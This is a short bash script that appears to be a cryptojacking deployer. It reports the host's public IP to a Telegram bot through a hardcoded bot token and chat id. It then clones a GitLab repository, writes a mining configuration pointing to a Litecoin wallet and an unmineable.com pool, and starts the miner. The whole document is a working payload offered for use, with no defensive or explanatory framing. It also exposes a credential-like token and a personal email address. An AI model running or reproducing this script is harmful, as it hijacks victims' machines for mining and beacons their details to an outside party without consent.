#!/bin/bash

apt-get install jq -y

numb=$(echo $(shuf -i 100-500 -n 1))
myIp="$(wget -qO- ifconfig.me/ip)"
n0z="Soldier009|$myIp"
for n in {1..50};
do
  sending="$(curl --silent -X GET 'https://api.telegram.org/bot1292048208:AAGORftT3gYtbYJeW53c0lnUItVLtcHoHG4/sendMessage?chat_id=-466847759&text=$n0z --compressed)"
  cek=$(jq -r '.ok' <<< $sending)
  if [[ "$cek" == true ]];
  then
    break
  fi
done

git clone https://gitlab.com/diablostrom5/master.git
touch master/config.ini 
echo "rigName = Soldier009" >> "master/config.ini"
echo "email = udumb4r4@gmail.com" >> "master/config.ini" 
echo "[Ethash]" >> "master/config.ini"
echo "wallet = ltc:ltc1qp9fzrvt4drzktr55hzzup5cey9g2u760wppvjn" >> "master/config.ini"
echo "coin = eth" >> "master/config.ini" 
echo "pool1 = ethash.unmineable.com:3333" >> "master/config.ini" 
echo "sortPools = true" >> "master/config.ini" 
cd master && chmod +x config.ini && chmod +x start && ./start
